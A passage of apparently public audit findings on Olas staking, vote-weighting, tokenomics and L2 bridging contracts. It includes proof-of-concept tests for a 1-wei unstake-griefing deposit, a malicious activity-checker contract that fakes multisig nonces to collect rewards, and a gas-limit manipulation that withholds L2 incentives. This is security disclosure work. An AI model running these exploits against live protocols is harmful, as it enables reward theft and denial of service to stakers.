In the function checkpoint, if available rewards is less than or equal to the total rewards that should be allocated to services, then the available rewards will be updated to zero.

    function checkpoint() public returns (
        uint256[] memory,
        uint256[][] memory,
        uint256[] memory,
        uint256[] memory,
        uint256[] memory evictServiceIds
    )
    {
        //.....
                    if (totalRewards > lastAvailableRewards) {
                        //....
                        lastAvailableRewards = 0;
                        //....
                    } else {
                        //....
                    }
                    availableRewards = lastAvailableRewards;
        //.....
    }

https://github.com/code-423n4/2024-05-olas/blob/main/registries/contracts/staking/StakingBase.sol#L645

As a result of calling the function checkpointAndClaim, the availableRewards is set to zero, and the service multisig receives its allocated reward.

Based on the explantion above, the owner of service can now unstake (because the availableRewards = 0). But, the malicious user (before the user unstakes) transfers 1 wei to the contract StakingNativeToken or calls the function deposit(1) in the contract StakingToken to transfer the smallest unit of the staking token. By doing so, the availableRewards becomes nonzero. As a result, the service owner cannot unstake now and must wait for minStakingDuration to be allowed to unstake.

    receive() external payable {
        //.....
        uint256 newAvailableRewards = availableRewards + msg.value;

        //......
        availableRewards = newAvailableRewards;

        //....
    }

https://github.com/code-423n4/2024-05-olas/blob/main/registries/contracts/staking/StakingNativeToken.sol#L39

    function deposit(uint256 amount) external {
        //.....
        uint256 newAvailableRewards = availableRewards + amount;

        //.....
        availableRewards = newAvailableRewards;

        //....
    }

https://github.com/code-423n4/2024-05-olas/blob/main/registries/contracts/staking/StakingToken.sol#L115

Test Case

In the following test, after checkpointAndClaim is called, the availableRewards becomes equal to zero (it means all the available rewards 0.01 ETH is allocated to the service). So, the serivce owner is allowed to unstake the service even though the service is staked less than minStakingDuration (minStakingDuration = 30 and livenessPeriod = 10). But, the attacker deposits 1 wei to make the availableRewards nonzero. By doing so, the function call unstake will revert.

        it("attacker prevents from unstaking", async function () {

            let attacker = signers[3];

            // Take a snapshot of the current state of the blockchain
            const snapshot = await helpers.takeSnapshot();

            // Deposit to the contract
            await deployer.sendTransaction({ to: stakingNativeToken.address, value: ethers.utils.parseEther("0.01") });

            // Approve services
            await serviceRegistry.approve(stakingNativeToken.address, serviceId);

            // Stake the service
            await stakingNativeToken.stake(serviceId);

            // Get the service multisig contract
            const service = await serviceRegistry.getService(serviceId);
            const multisig = await ethers.getContractAt("GnosisSafe", service.multisig);

            // Make transactions by the service multisig
            let nonce = await multisig.nonce();
            let txHashData = await safeContracts.buildContractCall(multisig, "getThreshold", [], nonce, 0, 0);
            let signMessageData = await safeContracts.safeSignMessage(agentInstances[0], multisig, txHashData, 0);
            await safeContracts.executeTx(multisig, txHashData, [signMessageData], 0);

            // Increase the time for the liveness period
            await helpers.time.increase(livenessPeriod);

            // Call claim (calls checkpoint as well)
            await stakingNativeToken.checkpointAndClaim(serviceId);

            console.log("available rewards before the attack: ", await stakingNativeToken.availableRewards());

            // Attacker deposits 1 wei to the contract
            await attacker.sendTransaction({ to: stakingNativeToken.address, value: 1 });

            console.log("available rewards after the attack: ", await stakingNativeToken.availableRewards());

            // It is not possible to unstake. The service owner must wait for minStakingDuration
            await expect(stakingNativeToken.unstake(serviceId)).to.be.reverted;

            // Restore a previous state of blockchain
            snapshot.restore();
        });

The result is:

  Staking
    Staking and unstaking
available rewards before the attack:  BigNumber { value: "0" }
available rewards after the attack:  BigNumber { value: "1" }
      ✔ attacker prevents from unstaking

Tools Used

Recommended Mitigation Steps

There should be a minimum deposit requirement to make this griefing attack expensive for the malicious user.

    receive() external payable {
        //.....

        require(msg.value >= 0.1 ETH, "too small deposit");

        //.....
    }

Assessed type

Context

Future stacking instances may be added to nominees in advance and then induced to be removed from the nominees

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/governance/contracts/VoteWeighting.sol#L324
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingFactory.sol#L141
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/governance/contracts/VoteWeighting.sol#L586

Vulnerability details

Impact

Due to the fact that the addresses of the stacking instaces deployed by the stacking factory can be predicted in advance, and the voteWeight contract does not check the addition of nominees.
this may lead to a situation where malicious individuals predict some future stacking instace addresses in advance,
then add them to the nominees in advance,
and then induce administrators to remove the nominees through abnormal behavior and other means.
Due to the inability to respond once the nominee is removed, this may result in future stacking instaces not receiving any incentive rewards

Proof of Concept

  1. StackingFactory uses the create2 method to deploy new instances, which allows all future deployment contract addresses to be predicted
    github:https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingFactory.sol#L141
    function getProxyAddressWithNonce(address implementation, uint256 localNonce) public view returns (address) {
        // Get salt based on chain Id and nonce values
        bytes32 salt = keccak256(abi.encodePacked(block.chainid, localNonce));

        // Get the deployment data based on the proxy bytecode and the implementation address
        bytes memory deploymentData = abi.encodePacked(type(StakingProxy).creationCode,
            uint256(uint160(implementation)));

        // Get the hash forming the contract address
        bytes32 hash = keccak256(
            abi.encodePacked(
                bytes1(0xff), address(this), salt, keccak256(deploymentData)
            )
        );

        return address(uint160(uint256(hash)));
    }
  1. VoteWeighting does not impose any restrictions on adding nominees, allowing malicious individuals to add undeployed stacking instance contracts as nominees in advance
    github:https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/governance/contracts/VoteWeighting.sol#L324C1-L344C6
    function addNomineeEVM(address account, uint256 chainId) external {
        // Check for the zero address
        if (account == address(0)) {
            revert ZeroAddress();
        }

        // Check for zero chain Id
        if (chainId == 0) {
            revert ZeroValue();
        }

        // Check for the chain Id overflow
        if (chainId > MAX_EVM_CHAIN_ID) {
            revert Overflow(chainId, MAX_EVM_CHAIN_ID);
        }

        Nominee memory nominee = Nominee(bytes32(uint256(uint160(account))), chainId);

        // Record nominee instance
        _addNominee(nominee);
    }
  1. Once the malicious party successfully induces the administrator to remove the nominator, new instances deployed from the stakingFactory contract in the future will not receive incentive rewards(Irreversible removal of nominees)
    github:https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/governance/contracts/VoteWeighting.sol#L586
   function removeNominee(bytes32 account, uint256 chainId) external {

Tools Used

Manual review

Recommended Mitigation Steps

Set up a method to recover removed nominees to avoid such attacks

Assessed type

Other

Function Tokenomics.trackServiceDonations uses old config values

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Tokenomics.sol#L910-L912
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Tokenomics.sol#L639-L694

Vulnerability details

Impact

  • Old values of veOLASThreshold, rewardUnitFraction, topUpUnitFraction are used in calculations
  • Service unit might not gain top-up olas
  • Malicious user can front run function trackServiceDonations and enjoy a lower threshold.

Proof of Concept

In contract Tokenomics, state variable veOLASThreshold is for deciding if the service is eligible for top-up:

bool topUpEligible;
            if (incentiveFlags[2] || incentiveFlags[3]) {
                address serviceOwner = IToken(serviceRegistry).ownerOf(serviceIds[i]);
                topUpEligible = (IVotingEscrow(ve).getVotes(serviceOwner) >= veOLASThreshold  ||
                    IVotingEscrow(ve).getVotes(donator) >= veOLASThreshold) ? true : false;
            }

To update this variable, the owner of Tokenomics calls changeTokenomicsParameters, this function will not set the new value of veOLASThreshold right away but instead store the new threshold value to variable nextVeOLASThreshold. This value nextVeOLASThreshold will be assigned to variable veOLASThreshold when someone calls checkpoint when the current epoch ends.

However, function trackServiceDonations does not call function checkpoint to update this value if the epoch ends. Therefore, trackServiceDonations will still uses the old value of veOLASThreshold, resulting in wrong calculation. If the new threshold is bigger than the old one, then user can enjoy a lower threshold by front-running (calling trackServiceDonations before anyone call checkpoint). If the new threshold is smaller than the old one, then users might loose their eligibility to top-up because threshold is not updated.
For example:

  • If the epochLen = 30 days and veOLASThreshold = 10_000e18
  • On day 0 the contract Tokenomics is deployed
  • On day 15 the owner calls changeTokenomicsParameters to with a new ve threshold value = 10_000e18 -1, nextVeOLASThreshold is set to 10_000e18 -1 but veOLASThreshold still = 10_000e18
  • On day 31 when the first epoch ends, someone donates to a service and eventually trackServiceDonations is called. Suppose that their current vote is 10_000e18 -1, the service will not receive any top-up because the threshold is still 10_000e18 (not updated).

This also happens with other parameters like topUpUnitFraction, rewardUnitFraction in function _finalizeIncentivesForUnitId:

function _finalizeIncentivesForUnitId(uint256 epochNum, uint256 unitType, uint256 unitId) internal {
        // Gets the overall amount of unit rewards for the unit's last epoch
        // The pendingRelativeReward can be zero if the rewardUnitFraction was zero in the first place
        // Note that if the rewardUnitFraction is set to zero at the end of epoch, the whole pending reward will be zero
        // reward = (pendingRelativeReward * rewardUnitFraction) / 100
        uint256 totalIncentives = mapUnitIncentives[unitType][unitId].pendingRelativeReward;
        if (totalIncentives > 0) {
            totalIncentives *= mapEpochTokenomics[epochNum].unitPoints[unitType].rewardUnitFraction;
            // Add to the final reward for the last epoch
            totalIncentives = mapUnitIncentives[unitType][unitId].reward + totalIncentives / 100;
            mapUnitIncentives[unitType][unitId].reward = uint96(totalIncentives);
            // Setting pending reward to zero
            mapUnitIncentives[unitType][unitId].pendingRelativeReward = 0;
        }

        // Add to the final top-up for the last epoch
        totalIncentives = mapUnitIncentives[unitType][unitId].pendingRelativeTopUp;
        // The pendingRelativeTopUp can be zero if the service owner did not stake enough veOLAS
        // The topUpUnitFraction was checked before and if it were zero, pendingRelativeTopUp would be zero as well
        if (totalIncentives > 0) {
            // Summation of all the unit top-ups and total amount of top-ups per epoch
            // topUp = (pendingRelativeTopUp * totalTopUpsOLAS * topUpUnitFraction) / (100 * sumUnitTopUpsOLAS)
            totalIncentives *= mapEpochTokenomics[epochNum].epochPoint.totalTopUpsOLAS;
            totalIncentives *= mapEpochTokenomics[epochNum].unitPoints[unitType].topUpUnitFraction;
            uint256 sumUnitIncentives = uint256(mapEpochTokenomics[epochNum].unitPoints[unitType].sumUnitTopUpsOLAS) * 100;
            totalIncentives = mapUnitIncentives[unitType][unitId].topUp + totalIncentives / sumUnitIncentives;
            mapUnitIncentives[unitType][unitId].topUp = uint96(totalIncentives);
            // Setting pending top-up to zero
            mapUnitIncentives[unitType][unitId].pendingRelativeTopUp = 0;
        }
    }

Depending on specific situations, a user could suffer losses due to the use of old values in calculation, or it's beneficial for them to front-run before anyone call checkpoint.

Below is a POC for the above examples, save these 2 tests case to file tokenomics/test/Tokenomics.js and run them using command:
npx hardhat test test/Tokenomics.js --grep VeOLASThreshold

it("VeOLASThreshold is not updated for service donation - checkpoint call", async () => {
            // Only treasury can access the function, so let's change it for deployer here
            await tokenomics.changeManagers(deployer.address, AddressZero, AddressZero);
            await ve.setWeightedBalance("9999999999999999999999"); // 10_000e18 - 1
            await ve.createLock(deployer.address);
            console.log(`Current veOLASThreshold ${await tokenomics.veOLASThreshold()}`)

            // Reduce veOLASThreshold to 10_000e18 - 1 (equal to donator votes)
            await tokenomics.changeTokenomicsParameters(
              0, 0, 0 ,0, "9999999999999999999999"
            );
            // Move time to next epoch
            await helpers.time.increase(epochLen);
            await tokenomics.checkpoint();
            console.log(`Current veOLASThreshold ${await tokenomics.veOLASThreshold()}`)

            await tokenomics.connect(deployer).trackServiceDonations(deployer.address, [1, 2],
                ["1000000000000000000000", "1000000000000000000000"], "2000000000000000000000");

            let incentiveBalances = await tokenomics.mapUnitIncentives(0, 1);
            console.log(incentiveBalances.pendingRelativeTopUp);

        });
        it("VeOLASThreshold is not updated for service donation - no checkpoint call", async () => {
            // Only treasury can access the function, so let's change it for deployer here
            await tokenomics.changeManagers(deployer.address, AddressZero, AddressZero);
            await ve.setWeightedBalance("9999999999999999999999"); // 10_000e18 - 1
            await ve.createLock(deployer.address);
            console.log(`Current veOLASThreshold ${await tokenomics.veOLASThreshold()}`)

            // Reduce veOLASThreshold to 10_000e18 - 1 (equal to donator votes)
            await tokenomics.changeTokenomicsParameters(
              0, 0, 0 ,0, "9999999999999999999999"
            );
            // Move time to next epoch
            await helpers.time.increase(epochLen);
            //await tokenomics.checkpoint();
            console.log(`Current veOLASThreshold ${await tokenomics.veOLASThreshold()}`)

            await tokenomics.connect(deployer).trackServiceDonations(deployer.address, [1, 2],
                ["1000000000000000000000", "1000000000000000000000"], "2000000000000000000000");

            let incentiveBalances = await tokenomics.mapUnitIncentives(0, 1);
            console.log(incentiveBalances.pendingRelativeTopUp);

        });

In the first test case, before calling trackServiceDonations, function checkpoint is called and so pendingRelativeTopUp > 0.
In the second test case, checkpoint is not called and pendingRelativeTopUp = 0

Tools Used

Manual review

Recommended Mitigation Steps

Function trackServiceDonations should call checkpoint to update the threshold first before comparing the threshold and current votes.

Assessed type

Invalid Validation

Staking contract can distribute rewards to multisig without activity

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/e2a8bc31d2769bfb578a06cc64919ad369a82c08/registries/contracts/staking/StakingFactory.sol#L168-L216
https://github.com/code-423n4/2024-05-olas/blob/e2a8bc31d2769bfb578a06cc64919ad369a82c08/registries/contracts/staking/StakingBase.sol#L278-L361
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingBase.sol#L406-L422

Vulnerability details

Relevant code: StakingFactory::createStakingInstance, StakingBase::_initialize, StakingBase::_checkRatioPass

Description

A Staking contract can be created permissionlessly by using the StakingFactory:

function createStakingInstance(
    address implementation,
    bytes memory initPayload
) external returns (address payable instance)

The first parameter is a whitelisted staking implementation and the second one encodes a function call to an initialize() function containing StakingParams.

One of the vital parameters for the proper work of the Staking contract is activityChecker. It's responsibility is to make sure the staked service has been active throughout the last epoch.

// Get the ratio pass activity check
activityData = abi.encodeCall(IActivityChecker.isRatioPass, (currentNonces, lastNonces, ts));
(success, returnData) = activityChecker.staticcall(activityData);

While other params are checked for their validity, activityChecker can be arbitrarily set by the caller. This opens up the possibility for a malicious actor to give their own implementation of activityChecker that can behave in any way they like. Since all the validity checks will pass, the newly created Staking contract can be voted for and used in the protocol.

Root Cause

Lack of validation for the activityChecker address when creating Staking contracts.

Impact

A malicious actor can permissionlessly create a Staking contract in which certain multisigs can always pass the activity check. Thus, allowing them to collect rewards without engaging in any blockchain activity. This breaks the core protocol invariant for paying only services that do real work.

PoC

The following PoC demonstrates how a malicious ActivityChecker contract can be inserted in StakingParam and manipulate the Staking contract to issue rewards, even though no transactions were done by the multisig.

Place the following contract at contracts/test/MaliciousActivityChecker.sol:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

interface IActivityChecker {
    function getMultisigNonces(address multisig) external view returns (uint256[] memory nonces);

    function isRatioPass(
        uint256[] memory curNonces,uint256[] memory lastNonces, uint256 ts
    ) external view returns (bool ratioPass);
}

contract MaliciousActivityChecker is IActivityChecker {
    IActivityChecker original;
    address public owner;
    address multisig;

    constructor(address _original) {
        original = IActivityChecker(_original);
        owner = msg.sender;
        multisig = address(0);
    }

    function setMultisig(address _multisig) public {
        require(msg.sender == owner, "MaliciousActivityChecker: not owner");
        multisig = _multisig;
    }

    function getMultisigNonces(address _multisig) external view returns (uint256[] memory nonces) {
        if (_multisig == multisig) {
            nonces = new uint256[](1);
            nonces[0] = 10_000;
        } else {
            nonces = original.getMultisigNonces(_multisig);
        }
    }

    function isRatioPass(
        uint256[] memory curNonces,uint256[] memory lastNonces, uint256 ts
    ) external view returns (bool ratioPass) {
        if (curNonces[0] == 10_000 && lastNonces[0] == 10_000) {
            return true;
        } else {
            return original.isRatioPass(curNonces, lastNonces, ts);
        }
    }

}

Add the following test in ServiceStaking.js:

    context("StakingRewards attack", function () {
        it("Should distribute rewards without multisig activity", async function () {
            const maliciousCheckerFactory = await ethers.getContractFactory(
                'MaliciousActivityChecker',
            );
            let maliciousActivityChecker = await maliciousCheckerFactory.deploy(stakingActivityChecker.address);
            expect(await maliciousActivityChecker.owner()).to.eq(deployer.address);

            serviceParams.activityChecker = maliciousActivityChecker.address;

            const StakingNativeToken = await ethers.getContractFactory("StakingNativeToken");
            stakingImplementation = await StakingNativeToken.deploy();
            let initPayload = stakingImplementation.interface.encodeFunctionData("initialize",
                [serviceParams]);
            const stakingAddress = await stakingFactory.callStatic.createStakingInstance(
                stakingImplementation.address, initPayload);
            await stakingFactory.createStakingInstance(stakingImplementation.address, initPayload);
            stakingNativeToken = await ethers.getContractAt("StakingNativeToken", stakingAddress);
            
            // Staking contract successfully initialized with malicious activity checker
            expect(await stakingNativeToken.activityChecker()).to.eq(maliciousActivityChecker.address);

            // Get the service multisig contract
            let service = await serviceRegistry.getService(serviceId);
            const multisig = await ethers.getContractAt("GnosisSafe", service.multisig);
            expect(await multisig.nonce()).to.eq(0);
            console.log("multisig.nonce: ", await multisig.nonce()); // nonce is 0
            
            await maliciousActivityChecker.setMultisig(service.multisig);

            // Deposit to the contract
            await deployer.sendTransaction({to: stakingNativeToken.address, value: ethers.utils.parseEther("1")});

            // // Approve services
            await serviceRegistry.approve(stakingNativeToken.address, serviceId);

            // Stake the service
            await stakingNativeToken.stake(serviceId);

            await helpers.time.increase(maxInactivity);

            // Call the checkpoint at this time
            await stakingNativeToken.checkpoint();

            // Checking the nonce info
            let serviceInfo = await stakingNativeToken.getServiceInfo(serviceId);
            const serviceInfoNonce = serviceInfo.nonces[0];
            expect(serviceInfoNonce).to.eq(10000);   // manipulated nonce
            expect(await multisig.nonce()).to.eq(0); // actual nonce in multisig is still 0

            const reward = await stakingNativeToken.calculateStakingReward(serviceId);
            console.log("Reward: ", reward);
            expect(reward).to.greaterThan(0);
            
            const balanceBefore = await ethers.provider.getBalance(multisig.address);
            stakingNativeToken.claim(serviceId);
            const balanceAfter = await ethers.provider.getBalance(multisig.address);
            expect(balanceAfter).gt(balanceBefore);
        });
    });

Suggested Mitigation

There is already a contract responsible for verifying the validity of the Staking contract instance - StakingVerifier. The verifyInstance function should be modified to also check if the correct ActivityChecker has been set:

address activityChecker;
...
function verifyInstance(address instance, address implementation) external view returns (bool) {
	...
	if (IStaking(instance).activityChecker() != activityChecker) {
	    return false;
	}
}

Assessed type

Invalid Validation

Exploiting gas limit manipulation in staking incentive distribution on L2

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/DefaultTargetDispenserL2.sol#L160

Vulnerability details

Impact

An attacker can provide specific amount of gas during claiming staking incentives, so that on L2, the distribution to the staking target would be unsuccessful and the OLAS amount will be held as withheldAmount.

Proof of Concept

During claiming the staking incentives, the parameter bridgePayload is provided by the user. The flow of function calls is as follows (assuming the bridging protocol is Optimism):

On L1:

Dispenser::claimStakingIncentives ==> Dispenser::_distributeStakingIncentives ==> DefaultDepositProcessorL1::sendMessage ==> OptimismTargetDispenserL2::_sendMessage
    function claimStakingIncentives(
        uint256 numClaimedEpochs,
        uint256 chainId,
        bytes32 stakingTarget,
        bytes memory bridgePayload
    ) external payable {
        //....
        _distributeStakingIncentives(chainId, stakingTarget, stakingIncentive, bridgePayload, transferAmount);
        //....
    }

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Dispenser.sol#L1041

    function _distributeStakingIncentives(
        uint256 chainId,
        bytes32 stakingTarget,
        uint256 stakingIncentive,
        bytes memory bridgePayload,
        uint256 transferAmount
    ) internal {
        //....
        if (chainId <= MAX_EVM_CHAIN_ID) {
            address stakingTargetEVM = address(uint160(uint256(stakingTarget)));
            IDepositProcessor(depositProcessor).sendMessage{value:msg.value}(stakingTargetEVM, stakingIncentive,
                bridgePayload, transferAmount);
        } else {
            // Send to non-EVM
            IDepositProcessor(depositProcessor).sendMessageNonEVM{value:msg.value}(stakingTarget,
                stakingIncentive, bridgePayload, transferAmount);
        }
    }

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Dispenser.sol#L423-L431

    function sendMessage(
        address target,
        uint256 stakingIncentive,
        bytes memory bridgePayload,
        uint256 transferAmount
    ) external virtual payable {
        //....
        uint256 sequence = _sendMessage(targets, stakingIncentives, bridgePayload, transferAmount);
        //...
    }

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/DefaultDepositProcessorL1.sol#L150

    function _sendMessage(uint256 amount, bytes memory bridgePayload) internal override {
        //...
        (uint256 cost, uint256 gasLimitMessage) = abi.decode(bridgePayload, (uint256, uint256));

        if (gasLimitMessage < GAS_LIMIT) {
            gasLimitMessage = GAS_LIMIT;
        }

        if (gasLimitMessage > MAX_GAS_LIMIT) {
            gasLimitMessage = MAX_GAS_LIMIT;
        }

        IBridge(l2MessageRelayer).sendMessage{value: cost}(l1DepositProcessor, data, uint32(gasLimitMessage));
    }

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/OptimismTargetDispenserL2.sol#L63

It shows that the amount of gas limit provided as parameter by the user will be forwarded to the destination contract on L2. Note that the minimum allowed value is 300_000.

uint256 public constant GAS_LIMIT = 300_000;

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/DefaultTargetDispenserL2.sol#L67

On L2, the flow of function calls is as follows:

On L2:

OptimismTargetDispenserL2::receiveMessage ==> DefaultTargetDispenserL2::_receiveMessage ==> DefaultTargetDispenserL2::_processData ==> StakingFactory::verifyInstanceAndGetEmissionsAmount
    function receiveMessage(bytes memory data) external payable {
        // Check for the target dispenser address
        address l1Processor = IBridge(l2MessageRelayer).xDomainMessageSender();

        // Process the data
        _receiveMessage(msg.sender, l1Processor, data);
    }

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/OptimismTargetDispenserL2.sol#L96

    function _receiveMessage(
        address messageRelayer,
        address sourceProcessor,
        bytes memory data
    ) internal virtual {
        //....
        _processData(data);
    }

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/DefaultTargetDispenserL2.sol#L242

    function _processData(bytes memory data) internal {
        //....
        bytes memory verifyData = abi.encodeCall(IStakingFactory.verifyInstanceAndGetEmissionsAmount, target);
        (bool success, bytes memory returnData) = stakingFactory.call(verifyData);
        //....
    }

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/DefaultTargetDispenserL2.sol#L160

    function verifyInstanceAndGetEmissionsAmount(address instance) external view returns (uint256 amount) {
        // Verify the proxy instance
        bool success = verifyInstance(instance);

        if (success) {
            // Get the proxy instance emissions amount
            amount = IStaking(instance).emissionsAmount();

            // If there is a verifier, adjust the amount
            address localVerifier = verifier;
            if (localVerifier != address(0)) {
                // Get the max possible emissions amount
                uint256 maxEmissions = IStakingVerifier(localVerifier).getEmissionsAmountLimit(instance);
                // Limit excessive emissions amount
                if (amount > maxEmissions) {
                    amount = maxEmissions;
                }
            }
        }
    }

https://github.com/code-423n4/2024-05-olas/blob/main/registries/contracts/staking/StakingFactory.sol#L294

This shows that the amount of gas provided by the user (as input parameter on L1) will be forwarded to the function OptimismTargetDispenserL2::receiveMessage. Suppose that the remaining gas before calling the function StakingFactory::verifyInstanceAndGetEmissionsAmount (before line 161) is X.
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/DefaultTargetDispenserL2.sol#L161

So, (63/64) * X will be forwarded to the StakingFactory.

If, the amount of gas used in StakingFactory::verifyInstanceAndGetEmissionsAmount is bigger than (63/64) * X, then the boolean success would be false and almost (1/64) * X would be left for execution of the remaining code.

(bool success, bytes memory returnData) = stakingFactory.call(verifyData);

Running a simple test shows that the amount of gas usage from line 162 to 213 if success = false would be around 14_000. This amount of gas is calculated in case the two storage variables stakingBatchNonce and withheldAmount are nonzero already (for sure changing their state from zero to nonzero would consume more gas).

Moreover, the amount of gas consumed during StakingFactory::verifyInstanceAndGetEmissionsAmount is unknown because it externally calls the instance that it can have customized implementation.

This provides an opportunity for an attacker to force the distribution to the staking targets (that are heavy gas consumer during the verification) to be unsuccessful, so always the transferred OLAS amount would be held in DefaultTargetDispenserL2 as withheldAmount. The attack is as follows:

  • The attacker notices that the verification on staking target consumes more than 63 * 14_000 = 882_000 gas. So, the attacker calls the function claimStakingIncentives with parameter bridgePayload equal to:
gasLimitMessage = 1500 + 64 * 14_000 = 897_500
bridgePayload = abi.encode(cost, gasLimitMessage);

Where 1500 is the required gas until line 161.
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/DefaultTargetDispenserL2.sol#L161

  • By doing so, the amount of gas left befor calling StakingFactory::verifyInstanceAndGetEmissionsAmount at line 161 would be almost equal to X = 64 * 14_000.
  • During the call, (63/64) * X = 882_000 would be forwarded to the StakingFactory. If the amount of gas consumed there is more than that, then the low-level call would be unsuccessful, and success = false. Thus, limitAmount = 0, and the OLAS amount would not be transferred to the target, and it would be held as withholdAmount.
           uint256 limitAmount;
           // If the function call was successful, check the return value
           if (success && returnData.length == 32) {
               limitAmount = abi.decode(returnData, (uint256));
           }

           // If the limit amount is zero, withhold OLAS amount and continue
           if (limitAmount == 0) {
               // Withhold OLAS for further usage
               localWithheldAmount += amount;
               emit AmountWithheld(target, amount);

               // Proceed to the next target
               continue;
           }

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/DefaultTargetDispenserL2.sol#L163-L177

  • Then, (1/64) * X = 14_000 would be left for the rest of the code, which is enough to be executed properly.

In summary, the attacker by watching the required gas for verification of a staking target can set the gas limit to a value, so that the staking incentives distribution would be unsuccessful, and the OLAS token amount would be held as withheldAmount.

Test Case

In the following test case:

  • First, a message is sent to L2 with funds for a wrong address. By doing so, the withheldAmount and stakingBatchNonce increases to 100 and 1, respectively. This is not part of the attack scenario, it is just to make those storage variables nonzero (to make the scenario more simple and realistic).
  • Then, a message is sent on L2 with funds for a correct address of staking target while the provided gas limit is 900_000. Because, the attacker notices that the verification of this instance consumes more than (900_000 - 1500) * (63/64). By doing so, on L2, the distribution would be unsuccessful, and the transferred OLAS would be held in the withheldAmount. Note that, if the attacker provides 1_100_000 gas, it would distribute the OLAS amount successfully success = true.
  • The result shows that the withheldAmount is increased from 100 to 200 meaning that sending the message with 900_000 gas leads to the situation that the OLAS token transfer to the staking target is unsuccessful, and it is indeed added to withheldAmount.
  • Note that to run the test properly two modifications are needed in mock contracts.

The function sendMessage in the contract BridgeRelayer should be modified as follows.

    function sendMessage(
      address target,
      bytes calldata message,
      uint32 gasLimit
  ) external payable {
      sender = msg.sender;
      (bool success, ) = target.call{gas: gasLimit}(message);

      if (!success) {
          revert("");
      }
  }

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/test/BridgeRelayer.sol#L286

The function verifyInstanceAndGetEmissionsAmount in the contract MockStakingFactory should be modified as follows to emulate a case where the verification consumes high gas.

    function verifyInstanceAndGetEmissionsAmount(
      address instance
  ) external view returns (uint256 amount) {
      // This is to emulate the case that verification consumes 900_000 gas
      // If instance is zero, the if-clause does not execute. Instance zero is just to make the withheldAmount nonzero
      if (instance != address(0)) {
          uint gasUsedDuringVerification = 900_000;
          uint intialGas = gasleft();
          uint gasUsed;
          while (gasUsed < gasUsedDuringVerification) {
              gasUsed = intialGas - gasleft();
          }
      }

      // Verify the proxy instance
      bool success = verifyInstance(instance);

      if (success) {
          // Get the proxy instance emissions amount
          amount = 100 ether;
      }
  }

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/test/MockStakingFactory.sol#L39

        it("Attacker forces a distribution to be unsuccessful", async function () {
           // Encode the staking data to emulate it being received on L2
           const stakingTarget = stakingInstance.address;
           const stakingIncentive = defaultAmount;

           ///////////////// This section is done to have withheldAmount and stakingBatchNonce nonzero
           // This is not part of the attack, just to make it more simpler and realistic
           // Because changing their state from nonzero to nonzero is cheaper than zero to nonzero
           let bridgePayload = ethers.utils.defaultAbiCoder.encode(["uint256", "uint256"],
               [defaultCost, defaultGasLimit]);
           // Send a message on L2 with funds for a wrong address to change the withheld amount from zero to nonzero
           await dispenser.mintAndSend(optimismDepositProcessorL1.address, ethers.constants.AddressZero, stakingIncentive, bridgePayload,
               stakingIncentive, { value: defaultMsgValue });
           /////////////////////////////////////////////////////////////////////////////////


           console.log("withheldAmount before the attack: ", await optimismTargetDispenserL2.withheldAmount());
           console.log("nonce before the attack: ", await optimismTargetDispenserL2.stakingBatchNonce());

           ////////////// Attacker sets the gaslimit equal to 900_000
           bridgePayload = ethers.utils.defaultAbiCoder.encode(["uint256", "uint256"],
               [defaultCost, 900000]);

           await dispenser.mintAndSend(optimismDepositProcessorL1.address, stakingTarget, stakingIncentive, bridgePayload,
               stakingIncentive, { value: defaultMsgValue });


           console.log("withheldAmount after the attack: ", await optimismTargetDispenserL2.withheldAmount());
           console.log("nonce after the attack: ", await optimismTargetDispenserL2.stakingBatchNonce());
       });

The result is:

  StakingBridging
   Optimism
withheldAmount before the attack:  BigNumber { value: "100" }
nonce before the attack:  BigNumber { value: "1" }
withheldAmount after the attack:  BigNumber { value: "200" }
nonce after the attack:  BigNumber { value: "2" }
     ✓ Attacker forces a distribution to be unsuccessful

Tools Used

Recommended Mitigation Steps

It is recommended that when StakingFactory::verifyInstanceAndGetEmissionsAmount is called, in case of failure, it checks the gas forwarded was enough or not. If it was not enough, then it should revert and the message should be retried on L2 again.

    function _processData(bytes memory data) internal {
        //....
        uint initialGas = gasLeft();

        bytes memory verifyData = abi.encodeCall(IStakingFactory.verifyInstanceAndGetEmissionsAmount, target);
        (bool success, bytes memory returnData) = stakingFactory.call(verifyData);

        uint afterGas = gasLeft();

        if(!success){
            if(afterGas <= (initialGas / 64)){
                revert("the provided gas was not enough");
            }
        }
        //....
    }

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/DefaultTargetDispenserL2.sol#L160

Assessed type

Context

WormholeDepositProcessorL1 never sends cross-chain messages and bridges tokens only to EVM chains

Lines of code

